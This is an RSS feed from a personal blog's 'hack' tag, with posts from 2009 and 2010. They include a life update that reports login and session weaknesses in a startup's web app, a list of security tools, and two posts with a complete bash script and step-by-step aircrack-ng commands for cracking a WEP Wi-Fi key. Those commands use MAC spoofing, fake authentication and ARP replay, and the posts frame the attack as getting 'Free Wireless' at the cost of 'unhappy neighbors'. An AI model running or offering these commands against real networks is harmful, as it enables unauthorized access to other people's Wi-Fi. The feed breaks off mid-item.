<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
	xmlns:media="http://search.yahoo.com/mrss/"
>

<channel>
	<title>Albertux~# ./Blog &#187; hack</title>
	<atom:link href="http://albertux.ayalasoft.com/es/tag/hack/feed/" rel="self" type="application/rss+xml" />
	<link>http://albertux.ayalasoft.com</link>
	<description>61 20 64 65 76 65 6c 6f 70 65 72 20 6c 69 66 65</description>
	<lastBuildDate>Thu, 01 Jul 2010 16:23:33 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
	<!-- podcast_generator="podPress/8.8" - maintenance_release="8.8.5.3" -->
	<copyright>2008 </copyright>
	<managingEditor>albertoi7@gmail.com (Albertux~# ./Blog)</managingEditor>
	<webMaster>albertoi7@gmail.com (Albertux~# ./Blog)</webMaster>
	<category>posts</category>
	<ttl>1440</ttl>
	<image>
		<url>http://ayalasoft.com/img/podcast02.jpg</url>
		<title>Albertux~# ./Blog &#187; hack</title>
		<link>http://albertux.ayalasoft.com</link>
		<width>144</width>
		<height>144</height>
	</image>
	<itunes:subtitle></itunes:subtitle>
	<itunes:summary>After three days without programming, life becomes meaningless.</itunes:summary>
	<itunes:keywords></itunes:keywords>
	<itunes:category text="Technology">
		<itunes:category text="Software How-To" />
	</itunes:category>
	<itunes:category text="Technology">
		<itunes:category text="Podcasting" />
	</itunes:category>
	<itunes:author>Albertux~# ./Blog</itunes:author>
	<itunes:owner>
		<itunes:name>Albertux~# ./Blog</itunes:name>
		<itunes:email>albertoi7@gmail.com</itunes:email>
	</itunes:owner>
	<itunes:block>no</itunes:block>
	<itunes:explicit>no</itunes:explicit>
	<itunes:image href="http://ayalasoft.com/img/podcast01.jpg" />
		<item>
		<title>Magic June</title>
		<link>http://albertux.ayalasoft.com/es/2010/06/22/magic-june/</link>
		<comments>http://albertux.ayalasoft.com/es/2010/06/22/magic-june/#comments</comments>
		<pubDate>Tue, 22 Jun 2010 17:06:06 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[personal]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[CA]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[rrripple]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=3148</guid>
		<description><![CDATA[(English) une<p><a href="http://albertux.ayalasoft.com/es/2010/06/22/magic-june/">Magic June</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Magic June</strong></p>
<p><strong>48 61 63 6b 20 54 68 65 20 50 6c 61 6e 65 74</strong></p>
<p><img src="http://ayalasoft.com/img/vta-pass-june.jpg"></p>
<p>Many changes in this month.</p>
<p>I was go to <a href="http://hackerdojo.pbworks.com" target="_blank">Hacker Dojo</a>. I meet Rob Brown a Javascript hacker, he develop this great tool: <a href="http://albertux.ayalasoft.com/2010/06/10/aardvark/" target="_blank">Aardvark</a></p>
<p><img src="http://ayalasoft.com/img/rob-brown-on-hackdojo-01.jpg" ><br />
<img src="http://ayalasoft.com/img/rob-brown-on-hackdojo-02.jpg" ></p>

<div class="wp_syntax"><div class="code"><pre class="javascript" style="font-family:monospace;"><span style="color: #003366; font-weight: bold;">function</span> currentTime<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
    currentTime <span style="color: #339933;">=</span> <span style="color: #003366; font-weight: bold;">new</span> Date<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
    <span style="color: #000066; font-weight: bold;">return</span> <span style="color: #009900;">&#123;</span>
        year<span style="color: #339933;">:</span> currentTime.<span style="color: #660066;">getFullYear</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">,</span>
        month<span style="color: #339933;">:</span> currentTime.<span style="color: #660066;">getMonth</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #CC0000;">1</span><span style="color: #339933;">,</span>
        day<span style="color: #339933;">:</span> currentTime.<span style="color: #660066;">getDate</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span>
    <span style="color: #009900;">&#125;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
&nbsp;
now <span style="color: #339933;">=</span> currentTime<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span> now.<span style="color: #660066;">day</span> <span style="color: #339933;">==</span> <span style="color: #CC0000;">14</span> <span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #009900;">&#40;</span> now.<span style="color: #660066;">month</span> <span style="color: #339933;">==</span> <span style="color: #CC0000;">6</span> <span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #009900;">&#40;</span> now.<span style="color: #660066;">year</span> <span style="color: #339933;">==</span> <span style="color: #CC0000;">2010</span> <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
    Albertux.<span style="color: #660066;">prototype</span>.<span style="color: #660066;">age</span> <span style="color: #339933;">=</span> <span style="color: #CC0000;">26</span><span style="color: #339933;">;</span> <span style="color: #006600; font-style: italic;">// Another year of life.</span>
<span style="color: #009900;">&#125;</span></pre></div></div>

<p>I always like hamburger with fries inside:</p>
<p><img src="http://ayalasoft.com/img/burguer.jpg"></p>
<p>Pictures and videos for me:</p>
<p><img src="http://ayalasoft.com/img/albertux-jun-10-2010-a.jpg"><br />
<img src="http://ayalasoft.com/img/albertux-jun-10-2010-b.jpg"><br />
<img src="http://ayalasoft.com/img/albertux-jun-10-2010-c.jpg"></p>
<p><strong>I&#8217;m not EMO!!!</strong><br />
<img src="http://ayalasoft.com/img/albertux-nasty.jpg"></p>
<p><object width="600" height="480"><param name="movie" value="http://www.youtube.com/v/CE1RmuCCY9U&#038;hl=en_US&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/CE1RmuCCY9U&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="480"></embed></object></p>
<p>Now I&#8217;m working on 2 projects as outsourcing for a moment:</p>
<ul>
<li><a href="http://www.3taps.com">www.3taps.com</a></li>
<li><strike><a href="http://www.rrripple.com">www.rrripple.com</a></strike> (not more)</li>
</ul>
<p>I do some stuff from rrripple for free, why calling me ? and asking me to do a specific schedule, but anyway the bugs I discover are here:</p>
<p>Duplicate items (not validation):<br />
<img src="http://www.ayalasoft.com/img/rrripple-duplicate-file-share-allow.png"></p>
<p>Percent go crazy after upload something.<br />
<img src="http://www.ayalasoft.com/img/rrripple-issue-percent-uploading-file-when-finish.png"></p>
<p>Download Videos:</p>
<ul>
<li><a href="http://www.ayalasoft.com/others/rrripple-write-notes-issues.ogv">Write notes sucks</a></li>
<li><a href="http://www.ayalasoft.com/others/rrripple-session-on-many-browsers-without-cookies.ogv">rrripple sessions on many browsers without cookies (they only validate remote address)</a></li>
<li><a href="http://www.ayalasoft.com/others/rrripple-test.ogv">Easy to brute force</a> (only you need to write a script and wordlist (password are on md5))</li>
</ul>
<p>You need <a href="http://www.videolan.org/vlc/" target="_blank">VLC</a> to watch this videos</p>
<p>The bugs I discover not watching the source code, only using the application <a href="http://www.mozilla.com/en-US/firefox/" target="_blank">Firefox</a> with <a href="http://getfirebug.com/" target="_blank">firebug</a> and use <a href="http://curl.haxx.se/" target="_blank">cURL</a> to show the brute force login and only using the application less than a hour.</p>
<p>But there are good news:</p>
<p><a href="http://techcrunch.com/2009/10/20/rrripple-a-touchscreen-friendly-hub-for-storing-and-securely-sharing-your-media/" target="_blank">Tech Crunch Review from rrripple.com</a></p>
<p>My personal comment:</p>
<p><strong>I never work for free, sucks, sucks, sucks.</strong></p>
<p><strong>Library Pics</strong><br />
<img src="http://www.ayalasoft.com/img/library-king-books.jpg"><br />
<img src="http://www.ayalasoft.com/img/library-king-the-rules.jpg"></p>
<p>You know I always follow the rules<br />
<img src="http://www.ayalasoft.com/img/library-king-the-rules-and-coke.jpg"><br />
<img src="http://www.ayalasoft.com/img/library-king-books-and-stuff.jpg"></p>
<p>My Job for a moment is seeking Job hahahaha XD</p>
<p>And June is almost over but not yet.</p>
<p><strong>More Codes, Hacks and Girls in the next Post.</strong></p>
<p><a href="http://albertux.ayalasoft.com/es/2010/06/22/magic-june/">Magic June</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2010/06/22/magic-june/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Samurai Linux</title>
		<link>http://albertux.ayalasoft.com/es/2010/04/10/samurai-linux/</link>
		<comments>http://albertux.ayalasoft.com/es/2010/04/10/samurai-linux/#comments</comments>
		<pubDate>Sat, 10 Apr 2010 17:56:52 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=2709</guid>
		<description><![CDATA[Talking with Preth00nker, says check Samurai Distro (Oriented to pen-testing Web Applications) Link: http://samurai.inguardians.com/ Samurai Linux is a post from: Albertux~# ./Blog<p><a href="http://albertux.ayalasoft.com/es/2010/04/10/samurai-linux/">Samurai Linux</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p>Talking with <a href="http://www.milw0rm.com/exploits/2246">Preth00nker</a>, says check Samurai Distro (Oriented to pen-testing Web Applications)</p>
<p><img src="http://ayalasoft.com/img/samurai-linux01.jpg" /></p>
<p><img src="http://ayalasoft.com/img/samurai-linux02.jpg" /></p>
<p>Link: <a href="http://samurai.inguardians.com/" target="_blank">http://samurai.inguardians.com/</a></p>
<p><a href="http://albertux.ayalasoft.com/es/2010/04/10/samurai-linux/">Samurai Linux</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2010/04/10/samurai-linux/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Insecurity</title>
		<link>http://albertux.ayalasoft.com/es/2010/04/01/insecurity/</link>
		<comments>http://albertux.ayalasoft.com/es/2010/04/01/insecurity/#comments</comments>
		<pubDate>Thu, 01 Apr 2010 23:30:13 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=1672</guid>
		<description><![CDATA[Insecurity Tools: Nikto.pl Web Scanner nmap Network Scanner Metasploit Framework wfuzz Brute Force Web App Wireshark Network Protocol Analyzer Snort IDS Nessus (vulnerability scanner) Hydra Cracker Password John the Ripper Cracker Password (Passive) Linux Distros: BackTrack Wireless Tools and others Damn Vulnerable Linux Others: http://sectools.org/ http://www.milw0rm.com/ http://www.exploit-db.com/ http://www.securityfocus.com/ Insecurity is a post from: Albertux~# ./Blog<p><a href="http://albertux.ayalasoft.com/es/2010/04/01/insecurity/">Insecurity</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Insecurity</strong></p>
<p>Tools:<br />
<a href="http://www.cirt.net/nikto2" target="_blank">Nikto.pl</a> Web Scanner<br />
<a href="http://www.nmap.org" target="_blank">nmap</a> Network Scanner<br />
<a href="http://www.metasploit.com/" target="_blank">Metasploit</a> Framework<br />
<a href="http://www.edge-security.com/wfuzz.php" target="_blank">wfuzz</a> Brute Force Web App<br />
<a href="http://www.wireshark.org/" target="_blank">Wireshark</a> Network Protocol Analyzer<br />
<a href="http://www.snort.org/" target="_blank">Snort</a> IDS<br />
<a href="http://www.nessus.org/" target="_blank">Nessus</a> (vulnerability scanner)<br />
<a href="http://freeworld.thc.org/thc-hydra/" target="_blank">Hydra</a> Cracker Password<br />
<a href="http://www.openwall.com/john/" target="_blank">John the Ripper</a> Cracker Password (Passive)</p>
<p>Linux Distros:<br />
<a href="http://www.backtrack-linux.org/" target="_blank">BackTrack</a> Wireless Tools and others<br />
<a href="http://www.damnvulnerablelinux.org/" target="_blank">Damn Vulnerable Linux</a> </p>
<p>Others:<br />
<a href="http://sectools.org/" target="_blank">http://sectools.org/</a><br />
<a href="http://www.milw0rm.com/" target="_blank">http://www.milw0rm.com/</a><br />
<a href="http://www.exploit-db.com/" target="_blank">http://www.exploit-db.com/</a><br />
<a href="http://www.securityfocus.com/" target="_blank">http://www.securityfocus.com/</a></p>
<p><a href="http://albertux.ayalasoft.com/es/2010/04/01/insecurity/">Insecurity</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2010/04/01/insecurity/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Wireless Hack Bash Script</title>
		<link>http://albertux.ayalasoft.com/es/2009/08/23/wireless-hack-bash-script/</link>
		<comments>http://albertux.ayalasoft.com/es/2009/08/23/wireless-hack-bash-script/#comments</comments>
		<pubDate>Mon, 24 Aug 2009 05:59:30 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=2147</guid>
		<description><![CDATA[Wireless Hack Bash Script #!/bin/bash # # WARNING: USE AT YOUR OWN RISK! # # SIDE EFFECTS: UNHAPPY NEIGHTBORS # # Author: ALbertux (Alberto Isaac Ayala Esquivias) # Mail: &#60;Albertux@AyalaSoft.com&#62; # Web: http://Albertux.AyalaSoft.com # Script: Wireless Hack # Tested on: Ubuntu 9.04 &#160; # A little trouble using gksudo gnome-terminal # https://bugs.launchpad.net/ubuntu/+source/gconf2/+bug/328575 # gnome-terminal -e [...]<p><a href="http://albertux.ayalasoft.com/es/2009/08/23/wireless-hack-bash-script/">Wireless Hack Bash Script</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Wireless Hack Bash Script</strong></p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#!/bin/bash</span>
<span style="color: #666666; font-style: italic;">#</span>
<span style="color: #666666; font-style: italic;"># WARNING: USE AT YOUR OWN RISK!</span>
<span style="color: #666666; font-style: italic;">#</span>
<span style="color: #666666; font-style: italic;"># SIDE EFFECTS: UNHAPPY NEIGHTBORS</span>
<span style="color: #666666; font-style: italic;"># </span>
<span style="color: #666666; font-style: italic;"># Author: ALbertux (Alberto Isaac Ayala Esquivias)</span>
<span style="color: #666666; font-style: italic;"># Mail: &lt;Albertux@AyalaSoft.com&gt;</span>
<span style="color: #666666; font-style: italic;"># Web: http://Albertux.AyalaSoft.com</span>
<span style="color: #666666; font-style: italic;"># Script: Wireless Hack</span>
<span style="color: #666666; font-style: italic;"># Tested on: Ubuntu 9.04</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># A little trouble using gksudo gnome-terminal</span>
<span style="color: #666666; font-style: italic;"># https://bugs.launchpad.net/ubuntu/+source/gconf2/+bug/328575</span>
<span style="color: #666666; font-style: italic;"># gnome-terminal -e &quot;sudo ....&quot; # could be ...</span>
<span style="color: #666666; font-style: italic;"># TERM=gnome-terminal</span>
<span style="color: #007800;">TERM</span>=xterm
&nbsp;
<span style="color: #666666; font-style: italic;"># A nasty function to run_like_a_root user sending the passwd</span>
<span style="color: #000000; font-weight: bold;">function</span> run_like_a_root<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #7a0874; font-weight: bold;">&#123;</span>
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #660033;">-S</span> $<span style="color: #000000; font-weight: bold;">@</span> <span style="color: #cc0000; font-style: italic;">&lt;&lt; EOF
your_password
EOF</span>
<span style="color: #7a0874; font-weight: bold;">&#125;</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Restore to normal: ./this_script.sh restore</span>
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #ff0000;">&quot;$1&quot;</span> == <span style="color: #ff0000;">&quot;restore&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>; <span style="color: #000000; font-weight: bold;">then</span>
	run_like_a_root <span style="color: #ff0000;">&quot;airmon-ng stop mon0&quot;</span>
	run_like_a_root <span style="color: #ff0000;">&quot;/etc/init.d/networking restart&quot;</span>
	run_like_a_root <span style="color: #ff0000;">&quot;NetworkManager&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">exit</span> <span style="color: #000000;">1</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Set Wireless Device: ./this_script.sh wlan1</span>
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #660033;">-z</span> $<span style="color: #000000;">1</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>; <span style="color: #000000; font-weight: bold;">then</span>
	<span style="color: #007800;">WDEVICE</span>=wlan0 <span style="color: #666666; font-style: italic;"># Could be diferrent on your notebook</span>
<span style="color: #000000; font-weight: bold;">else</span>
	<span style="color: #007800;">WDEVICE</span>=$<span style="color: #000000;">1</span> <span style="color: #666666; font-style: italic;"># Set Wireless Device</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Stop Wireless</span>
run_like_a_root airmon-ng stop <span style="color: #007800;">$WDEVICE</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Kill all fu**ing process using the Wireless Device:</span>
run_like_a_root <span style="color: #c20cb9; font-weight: bold;">kill</span> <span style="color: #660033;">-9</span> <span style="color: #000000; font-weight: bold;">`</span>run_like_a_root airmon-ng start <span style="color: #007800;">$WDEVICE</span> <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">grep</span> ^<span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">1</span>-<span style="color: #000000;">9</span><span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">awk</span> <span style="color: #ff0000;">' { print $1 } '</span><span style="color: #000000; font-weight: bold;">`</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Wireless Devices Down (we need to change the Mac)</span>
run_like_a_root <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> <span style="color: #007800;">$WDEVICE</span> down
run_like_a_root <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> mon0 down
&nbsp;
<span style="color: #666666; font-style: italic;"># Fake Mac, Example:</span>
<span style="color: #007800;">FAKEMAC</span>=00:<span style="color: #000000;">66</span>:00:<span style="color: #000000;">66</span>:00:<span style="color: #000000;">66</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Set Fake Mac</span>
run_like_a_root macchanger <span style="color: #660033;">-m</span> <span style="color: #007800;">$FAKEMAC</span> <span style="color: #007800;">$WDEVICE</span>
run_like_a_root macchanger <span style="color: #660033;">-m</span> <span style="color: #007800;">$FAKEMAC</span> mon0
&nbsp;
<span style="color: #666666; font-style: italic;"># Up the Wireless Interface</span>
run_like_a_root <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> mon0 up
&nbsp;
<span style="color: #666666; font-style: italic;"># See all available networks</span>
run_like_a_root <span style="color: #007800;">$TERM</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;airodump-ng mon0&quot;</span> <span style="color: #000000; font-weight: bold;">&amp;</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Watch the xterm loaded and write the values (maybe you need resize xterm window)</span>
<span style="color: #c20cb9; font-weight: bold;">clear</span>
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Network Name: &quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span> ESSID
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Network Mac: &quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span> BSSID
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Network Channel: &quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span> CHANNEL
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Close the airodump-ng xterm and press [enter]&quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Get Data (IVs)</span>
run_like_a_root <span style="color: #007800;">$TERM</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;airodump-ng mon0 -w data -c <span style="color: #007800;">$CHANNEL</span> --bssid <span style="color: #007800;">$BSSID</span>&quot;</span> <span style="color: #000000; font-weight: bold;">&amp;</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Fake Authentication Attack</span>
run_like_a_root <span style="color: #007800;">$TERM</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;watch aireplay-ng -1 0 -e <span style="color: #007800;">$ESSID</span> -a <span style="color: #007800;">$BSSID</span> -h <span style="color: #007800;">$FAKEMAC</span> mon0&quot;</span> <span style="color: #000000; font-weight: bold;">&amp;</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># ARP Request</span>
run_like_a_root <span style="color: #007800;">$TERM</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;aireplay-ng -3 -b <span style="color: #007800;">$BSSID</span> -h <span style="color: #007800;">$FAKEMAC</span> mon0&quot;</span> <span style="color: #000000; font-weight: bold;">&amp;</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Wait some time ...</span>
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Press any kay to launch aircrack-ng (30,000+ on data recommended)&quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Crack the Passwd</span>
run_like_a_root <span style="color: #007800;">$TERM</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;aircrack-ng data-*.cap&quot;</span> <span style="color: #000000; font-weight: bold;">&amp;</span>
&nbsp;
<span style="color: #7a0874; font-weight: bold;">exit</span> <span style="color: #000000;">0</span></pre></div></div>

<p><a href="http://albertux.ayalasoft.com/2009/08/12/free-wireless-on-ubuntu-904/">Free Wireless on Ubuntu 9.04</a></p>
<p><a href="http://albertux.ayalasoft.com/es/2009/08/23/wireless-hack-bash-script/">Wireless Hack Bash Script</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2009/08/23/wireless-hack-bash-script/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Free Wireless on Ubuntu 9.04</title>
		<link>http://albertux.ayalasoft.com/es/2009/08/12/free-wireless-on-ubuntu-904/</link>
		<comments>http://albertux.ayalasoft.com/es/2009/08/12/free-wireless-on-ubuntu-904/#comments</comments>
		<pubDate>Wed, 12 Aug 2009 06:03:47 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=2116</guid>
		<description><![CDATA[Free Wireless Using Ubuntu 9.04: sudo apt-get install aircrack-ng macchanger The device name could be different on your machine sudo airmon-ng stop wlan0 sudo airmon-ng start wlan0 sudo ifconfig wlan0 down sudo ifconfig mon0 down sudo macchanger -m $FAKEMAC wlan0 sudo macchanger -m $FAKEMAC mon0 sudo ifconfig mon0 up sudo airodump-ng mon0 # See all [...]<p><a href="http://albertux.ayalasoft.com/es/2009/08/12/free-wireless-on-ubuntu-904/">Free Wireless on Ubuntu 9.04</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Free Wireless</strong></p>
<p>Using Ubuntu 9.04:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> aircrack-ng macchanger</pre></div></div>

<p>The device name could be different on your machine</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> airmon-ng stop wlan0
<span style="color: #c20cb9; font-weight: bold;">sudo</span> airmon-ng start wlan0
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> wlan0 down
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> mon0 down
<span style="color: #c20cb9; font-weight: bold;">sudo</span> macchanger <span style="color: #660033;">-m</span> <span style="color: #007800;">$FAKEMAC</span> wlan0
<span style="color: #c20cb9; font-weight: bold;">sudo</span> macchanger <span style="color: #660033;">-m</span> <span style="color: #007800;">$FAKEMAC</span> mon0
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> mon0 up
<span style="color: #c20cb9; font-weight: bold;">sudo</span> airodump-ng mon0 <span style="color: #666666; font-style: italic;"># See all available networks choose one channel</span></pre></div></div>

<p>Inject packets:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;"># terminal 01</span>
 <span style="color: #c20cb9; font-weight: bold;">sudo</span> airodump-ng mon0 <span style="color: #660033;">-w</span> wdata <span style="color: #660033;">-c</span> <span style="color: #000000;">6</span> <span style="color: #660033;">--bssid</span>  00:00:00:00:00:00 <span style="color: #666666; font-style: italic;"># -c $CHANNEL</span>
<span style="color: #666666; font-style: italic;"># terminal 02</span>
watch <span style="color: #c20cb9; font-weight: bold;">sudo</span> aireplay-ng <span style="color: #660033;">-1</span> <span style="color: #000000;">0</span> <span style="color: #660033;">-e</span> <span style="color: #007800;">$SSID</span> <span style="color: #660033;">-a</span> 00:00:00:00:00:00 <span style="color: #660033;">-h</span> <span style="color: #007800;">$FAKEMAC</span> mon0
<span style="color: #666666; font-style: italic;"># terminal 03</span>
<span style="color: #c20cb9; font-weight: bold;">sudo</span> aireplay-ng <span style="color: #660033;">-3</span> <span style="color: #660033;">-b</span> 00:00:00:00:00:00 <span style="color: #660033;">-h</span> <span style="color: #007800;">$FAKEMAC</span> mon0
<span style="color: #666666; font-style: italic;"># wait some time to get 30,000 on Data on terminal 01</span></pre></div></div>

<p>Now get the password:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> aircrack-ng wdata-<span style="color: #000000; font-weight: bold;">*</span>.cap</pre></div></div>

<p>See Screens:<br />
<a href="http://www.ayalasoft.com/media/Need-wireless-01.png" rel="shadowbox[acw]"><img src="http://www.ayalasoft.com/media/Need-wireless-thumb-01.png"></a><br />
<a href="http://www.ayalasoft.com/media/Need-wireless-02.png" rel="shadowbox[acw]"><img src="http://www.ayalasoft.com/media/Need-wireless-thumb-02.png"></a></p>
<p><a href="http://albertux.ayalasoft.com/es/2009/08/12/free-wireless-on-ubuntu-904/">Free Wireless on Ubuntu 9.04</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2009/08/12/free-wireless-on-ubuntu-904/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Saturday Morning Hacking</title>
		<link>http://albertux.ayalasoft.com/es/2008/11/08/saturday-morning-hacking/</link>
		<comments>http://albertux.ayalasoft.com/es/2008/11/08/saturday-morning-hacking/#comments</comments>
		<pubDate>Sat, 08 Nov 2008 22:53:02 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[database]]></category>
